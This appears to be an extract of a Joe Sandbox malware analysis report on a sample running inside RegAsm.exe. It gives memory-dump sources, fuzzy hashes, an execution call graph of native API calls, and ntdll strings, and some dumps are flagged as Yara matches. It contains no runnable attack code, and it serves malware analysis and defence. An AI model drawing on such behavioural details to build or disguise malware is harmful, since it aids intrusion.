                • Source File: 00000008.00000002.1315050100.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_11cd000_temp_executable.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8f7cc5a0f6e3d782e8fe5dff9704e0cef39dd6f5c92702d89a514f99e13fe634
                • Instruction ID: fd0eaf49ea1a02f6db36cbaa674519eda01fb77f254bb5b6cb4bc76e9ff8d612
                • Opcode Fuzzy Hash: 8f7cc5a0f6e3d782e8fe5dff9704e0cef39dd6f5c92702d89a514f99e13fe634
                • Instruction Fuzzy Hash: 81F0C232104384AEEB148A19E884B62FF98EB51634F18C16EED080B287C3789844CAB1

                Non-executed Functions

                Function 013C354A Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d6dab92e2eeb877ed1f87db48e1658d04d78618a3a7396afc724e068cb28eef
                • Instruction ID: 01fdcc031e9252f17df2c5dd3bcef2169d1d0ebbcdffa5f43d12e1afe7b476bc
                • Opcode Fuzzy Hash: 1d6dab92e2eeb877ed1f87db48e1658d04d78618a3a7396afc724e068cb28eef
                • Instruction Fuzzy Hash: 8221A772D056188BEB28CF6B99043DABAF6BFC9314F04C1BAC508A6254DB750A858F54

                Execution Graph

                Execution Coverage:0.9%
                Dynamic/Decrypted Code Coverage:5.3%
                Signature Coverage:9.6%
                Total number of Nodes:94
                Total number of Limit Nodes:8
                execution_graph 80769 42f843 80772 42e623 80769->80772 80775 42c8d3 80772->80775 80774 42e63c 80776 42c8ed 80775->80776 80777 42c8fe RtlFreeHeap 80776->80777 80777->80774 80778 42f7e3 80779 42f7f3 80778->80779 80780 42f7f9 80778->80780 80783 42e703 80780->80783 80782 42f81f 80786 42c883 80783->80786 80785 42e71e 80785->80782 80787 42c8a0 80786->80787 80788 42c8b1 RtlAllocateHeap 80787->80788 80788->80785 80789 424903 80790 42491f 80789->80790 80791 424947 80790->80791 80792 42495b 80790->80792 80793 42c563 NtClose 80791->80793 80799 42c563 80792->80799 80795 424950 80793->80795 80796 424964 80802 42e743 RtlAllocateHeap 80796->80802 80798 42496f 80800 42c57d 80799->80800 80801 42c58e NtClose 80800->80801 80801->80796 80802->80798 80881 424c93 80882 424cac 80881->80882 80883 424cf7 80882->80883 80886 424d37 80882->80886 80888 424d3c 80882->80888 80884 42e623 RtlFreeHeap 80883->80884 80885 424d07 80884->80885 80887 42e623 RtlFreeHeap 80886->80887 80887->80888 80889 42bb33 80890 42bb4d 80889->80890 80893 2f32df0 LdrInitializeThunk 80890->80893 80891 42bb75 80893->80891 80803 417663 80804 417687 80803->80804 80805 4176c3 LdrLoadDll 80804->80805 80806 41768e 80804->80806 80805->80806 80807 413b03 80811 413b23 80807->80811 80809 413b8c 80810 413b82 80811->80809 80812 41b2c3 RtlFreeHeap LdrInitializeThunk 80811->80812 80812->80810 80813 4019e6 80814 401a06 80813->80814 80817 42fcb3 80814->80817 80820 42e1e3 80817->80820 80821 42e1ff 80820->80821 80830 407203 80821->80830 80823 42e215 80829 401a7a 80823->80829 80833 41afb3 80823->80833 80825 42e234 80826 42e249 80825->80826 80827 42c923 ExitProcess 80825->80827 80844 42c923 80826->80844 80827->80826 80847 416323 80830->80847 80832 407210 80832->80823 80834 41afdf 80833->80834 80865 41aea3 80834->80865 80837 41b00c 80838 41b017 80837->80838 80841 42c563 NtClose 80837->80841 80838->80825 80839 41b040 80839->80825 80840 41b024 80840->80839 80842 42c563 NtClose 80840->80842 80841->80838 80843 41b036 80842->80843 80843->80825 80845 42c93d 80844->80845 80846 42c94e ExitProcess 80845->80846 80846->80829 80848 416340 80847->80848 80850 416359 80848->80850 80851 42cfa3 80848->80851 80850->80832 80853 42cfbd 80851->80853 80852 42cfec 80852->80850 80853->80852 80858 42bb83 80853->80858 80856 42e623 RtlFreeHeap 80857 42d065 80856->80857 80857->80850 80859 42bba0 80858->80859 80862 2f32c0a 80859->80862 80860 42bbcc 80860->80856 80863 2f32c11 80862->80863 80864 2f32c1f LdrInitializeThunk 80862->80864 80863->80860 80864->80860 80866 41aebd 80865->80866 80870 41af99 80865->80870 80871 42bc23 80866->80871 80869 42c563 NtClose 80869->80870 80870->80837 80870->80840 80872 42bc3d 80871->80872 80875 2f335c0 LdrInitializeThunk 80872->80875 80873 41af8d 80873->80869 80875->80873

                Executed Functions

                Function 00417663 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
                • Instruction ID: d3f44e460cc280bd8e551566dc012685ef73f4a32ffc8664677e37c5d98fc3a0
                • Opcode Fuzzy Hash: ddb6e7506c6e67887ebc9e0bc13429d94af2d16605d59da66af83c1694b8c914
                • Instruction Fuzzy Hash: 26015EB1E0020DBBDB10DBE5DC42FDEB7789B14308F4081AAE90897241FA34EB488B95
                Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 25 42c563-42c59c call 404583 call 42d7a3 NtClose
                APIs
                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                • Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
                • Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
                • Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4
                Function 02F335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 48 2f335c0-2f335cc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a38e75333c2720c2d8e787aaa14802be982d9cc83f92bdd3a1654bb7ca5e102d
                • Instruction ID: f7023b1d79e406a9f29944feac0235c5a59b3ad69d0eb043c87650bb2ec8ea9e
                • Opcode Fuzzy Hash: a38e75333c2720c2d8e787aaa14802be982d9cc83f92bdd3a1654bb7ca5e102d
                • Instruction Fuzzy Hash: CE90023160550412D10071588914707140587D0281F65C412A1424568D8BD58A5165A2
                Function 02F32C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 46 2f32c70-2f32c7c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: e216754d508e2f74afcf05cfcacd7fdb83e1ef200eb9fd3ba64e79b3b2bf6e94
                • Instruction ID: 2f526e7c63af380a8052f68c40600ff4f72aab28158eb91820f20a5ab383245f
                • Opcode Fuzzy Hash: e216754d508e2f74afcf05cfcacd7fdb83e1ef200eb9fd3ba64e79b3b2bf6e94
                • Instruction Fuzzy Hash: 3190023120148812D1107158C80474B040587D0381F59C412A5424658D8AD589917121
                Function 02F32DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 47 2f32df0-2f32dfc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 6cf1547201214a1c657398ecdb0b5e7b4057f5342568fd0b69fd3942348ebded
                • Instruction ID: 1f671591b8078fa13d9fc9352b67d7bc97ad7043c7dc53b4a72539ce2ddc6d20
                • Opcode Fuzzy Hash: 6cf1547201214a1c657398ecdb0b5e7b4057f5342568fd0b69fd3942348ebded
                • Instruction Fuzzy Hash: C090023120140423D11171588904707040987D02C1F95C413A1424558D9AD68A52A121
                Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 20 42c8d3-42c914 call 404583 call 42d7a3 RtlFreeHeap
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                • Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
                • Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
                • Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4
                Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 15 42c883-42c8c7 call 404583 call 42d7a3 RtlAllocateHeap
                APIs
                • RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                • Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
                • Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
                • Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4
                Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 30 42c923-42c95c call 404583 call 42d7a3 ExitProcess
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
                • Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
                • Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
                • Instruction Fuzzy Hash: 0AE026353102007BD510FA5ADC01F97775CDFC5710F400419FA487B242C671790083F1
                Function 00417656 Relevance: 1.5, APIs: 1, Instructions: 24libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 35 417656-417657 36 41765a 35->36 37 4176ac-4176c1 call 42dcb3 35->37 36->37 40 4176c3-4176d7 LdrLoadDll 37->40 41 4176da-4176dd 37->41 40->41
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176D5
                Memory Dump Source
                • Source File: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
                • Instruction ID: cf65e461030a38222c57f55313a0619b2327d6594293c5b5006fcba462ae1fac
                • Opcode Fuzzy Hash: 28aa7e2d02eedffb485acc23daf37528fc48007df721c371ca5d5e4060a106f8
                • Instruction Fuzzy Hash: 42E048B5E0410AABDF00CF98CC41F9EB7B8AB54304F008196E84CD6241F574F659C755
                Function 02F32C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 42 2f32c0a-2f32c0f 43 2f32c11-2f32c18 42->43 44 2f32c1f-2f32c26 LdrInitializeThunk 42->44
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f42cd188f3a6add726bf6f5f2c14f7f78eafba4ddf4a1512d3f08de72c792bfb
                • Instruction ID: 6faa2d76be74de0fb0c3700961d95dca9b052e2114d7ebb0ba9d949ed83325e7
                • Opcode Fuzzy Hash: f42cd188f3a6add726bf6f5f2c14f7f78eafba4ddf4a1512d3f08de72c792bfb
                • Instruction Fuzzy Hash: CAB09B71D015C5D5DA11F7604E087177D0067D07D1F15C062D3030641F4778D5D1E175

                Non-executed Functions

                Function 02F72349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: 374b8282005b5be9846bb80be12206633b3cf62f88de38de2cd5de51afd6f8c0
                • Instruction ID: 1423b44529ef070d730efbd881878b0ec61f31296761f2bbd07470cbd118eed7
                • Opcode Fuzzy Hash: 374b8282005b5be9846bb80be12206633b3cf62f88de38de2cd5de51afd6f8c0
                • Instruction Fuzzy Hash: 7A926C71A48345ABE721DF24C880F6BB7E9BB84794F04492EFB95D7290D770E844CB92
                Function 02F28620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                Download Yara Rule
                Strings
                • Address of the debug info found in the active list., xrefs: 02F654AE, 02F654FA
                • Critical section address, xrefs: 02F65425, 02F654BC, 02F65534
                • Thread is in a state in which it cannot own a critical section, xrefs: 02F65543
                • Thread identifier, xrefs: 02F6553A
                • undeleted critical section in freed memory, xrefs: 02F6542B
                • Critical section address., xrefs: 02F65502
                • 8, xrefs: 02F652E3
                • Critical section debug info address, xrefs: 02F6541F, 02F6552E
                • Invalid debug info address of this critical section, xrefs: 02F654B6
                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F6540A, 02F65496, 02F65519
                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F654CE
                • corrupted critical section, xrefs: 02F654C2
                • double initialized or corrupted critical section, xrefs: 02F65508
                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02F654E2
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                • API String ID: 0-2368682639
                • Opcode ID: b3b2fe3f37f80b8f2f9d9fc758d84a07c01ef939cda4732774b61d6ecd40f266
                • Instruction ID: df606e2835a7aec90731a2a891165a4abc65e68a9841b0b1ef39ca778308f264
                • Opcode Fuzzy Hash: b3b2fe3f37f80b8f2f9d9fc758d84a07c01ef939cda4732774b61d6ecd40f266
                • Instruction Fuzzy Hash: F181BD71E80358EFEB20CF94C949FAEBBB5EB08754F548119F609BB640C371A846CB60
                Function 02FA12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                • API String ID: 0-3591852110
                • Opcode ID: 5fe3bf5de96ee31295cd59e68a8f97ac8fabfee6438154f3e8f9fbe49527475a
                • Instruction ID: 6a4151114c06f9f7165bc820bee3695f4cbb1aa49268e37ab51f72292b9e9822
                • Opcode Fuzzy Hash: 5fe3bf5de96ee31295cd59e68a8f97ac8fabfee6438154f3e8f9fbe49527475a
                • Instruction Fuzzy Hash: 8812D0B0A00646DFDB258F28C460BB7B7F6FF09798F1A845DE58A8B641D334E881CB50
                Function 02EED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                • API String ID: 0-3532704233
                • Opcode ID: d4a9ed197616c956ec0329041046fdf097997b003599c2b838a4bc3b63a381d3
                • Instruction ID: 8f71e9a2a3ebc1869caff86dd13ebeec918faa82a04b65df8f04d2fc0156178b
                • Opcode Fuzzy Hash: d4a9ed197616c956ec0329041046fdf097997b003599c2b838a4bc3b63a381d3
                • Instruction Fuzzy Hash: 0FB1AFB19483519FCB11DF24C850B6BBBE9AF88748F01992EF98AD7240D770D948CF92
                Function 02F89179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                • API String ID: 0-3063724069
                • Opcode ID: 2d1e9d08617e4f19067ec1b84e5ae0f5dc2e7dfbe393ddcea3c17def92f3239c
                • Instruction ID: 5d3d67d8fb7a96a167ef52edd305a1c086d07f7a0ac4721ae9e018375eb7377c
                • Opcode Fuzzy Hash: 2d1e9d08617e4f19067ec1b84e5ae0f5dc2e7dfbe393ddcea3c17def92f3239c
                • Instruction Fuzzy Hash: 29D1E1B2904391AFD721EB64CC40B7BF7E9AF84798F444929FB84A7250D7B0D944CB92
                Function 02FA0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: 87a9a51ab43b5eb3791ce982126c2a50fdac7bfed17449bc6ce5e865a9858db9
                • Instruction ID: 21ed5e88d5503fabcabbbf34bc0a0a390c1171a6fa1380dea5c55868ff2cd9db
                • Opcode Fuzzy Hash: 87a9a51ab43b5eb3791ce982126c2a50fdac7bfed17449bc6ce5e865a9858db9
                • Instruction Fuzzy Hash: 9AD1F071A40289DFDB12DF68D460BA9BBF2FF0A788F08804DE5469B351CB35A841CF50
                Function 02EED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                Download Yara Rule
                Strings
                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02EED0CF
                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02EED2C3
                • @, xrefs: 02EED0FD
                • @, xrefs: 02EED2AF
                • @, xrefs: 02EED313
                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02EED262
                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02EED146
                • Control Panel\Desktop\LanguageConfiguration, xrefs: 02EED196
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                • API String ID: 0-1356375266
                • Opcode ID: 1916db2cda73a0132c741abd1659ba3c0e019d9534753757b91fb23b8258cd61
                • Instruction ID: 97fbbfb49716a22bf02fad8e34c556603e80e45a72c6e5761aaca32f66b0d8e1
                • Opcode Fuzzy Hash: 1916db2cda73a0132c741abd1659ba3c0e019d9534753757b91fb23b8258cd61
                • Instruction Fuzzy Hash: CFA17E719483459FE721DF24C850B9BBBE9BF88759F00892EFA8996240D774D908CF93
                Function 02EEF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-523794902
                • Opcode ID: bd144669041ddb943832dddf8f6458a46b3c95536648c060906e7aefccbb7378
                • Instruction ID: 3cea795d771b87fc863a0568f5a953a1239110d34ae71dbe777513039ae8dcb1
                • Opcode Fuzzy Hash: bd144669041ddb943832dddf8f6458a46b3c95536648c060906e7aefccbb7378
                • Instruction Fuzzy Hash: A542FF316443818FDB25CF28C884B6ABBE6FF88348F04996DF9868B751DB34E845CB51
                Function 02F0B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                • API String ID: 0-122214566
                • Opcode ID: 36e7087856e0cb5064009b719be3c0b3f554c008e63bcdd80fd23ef55e9956d6
                • Instruction ID: 2542a87f6a573b2298b688edf119dc96f098fc61db9c85182189f1611238a29c
                • Opcode Fuzzy Hash: 36e7087856e0cb5064009b719be3c0b3f554c008e63bcdd80fd23ef55e9956d6
                • Instruction Fuzzy Hash: DEC11431F002559BDB258F64C8C1B7EB7A6AF457C8F2481A9EF06AB2C0D7748984E791
                Function 02F263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 3dcdf25a01388bcf1540324f659d46d9a8af691176b9fa4142d32df7932b8888
                • Instruction ID: 4b83810b63a2aed77c5a36752b09ee3efb470727e6deceaaae9216343320aafc
                • Opcode Fuzzy Hash: 3dcdf25a01388bcf1540324f659d46d9a8af691176b9fa4142d32df7932b8888
                • Instruction Fuzzy Hash: E5913831F40328DBEB36EF54DD49BBA77A9EB45BD8F100169EB01AB281D7709801CB91
                Function 02F2C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                Download Yara Rule
                Strings
                • minkernel\ntdll\ldrredirect.c, xrefs: 02F68181, 02F681F5
                • Loading import redirection DLL: '%wZ', xrefs: 02F68170
                • LdrpInitializeProcess, xrefs: 02F2C6C4
                • LdrpInitializeImportRedirection, xrefs: 02F68177, 02F681EB
                • minkernel\ntdll\ldrinit.c, xrefs: 02F2C6C3
                • Unable to build import redirection Table, Status = 0x%x, xrefs: 02F681E5
                Memory Dump Source
                • Source File: 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_2ec0000_RegAsm.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-475462383
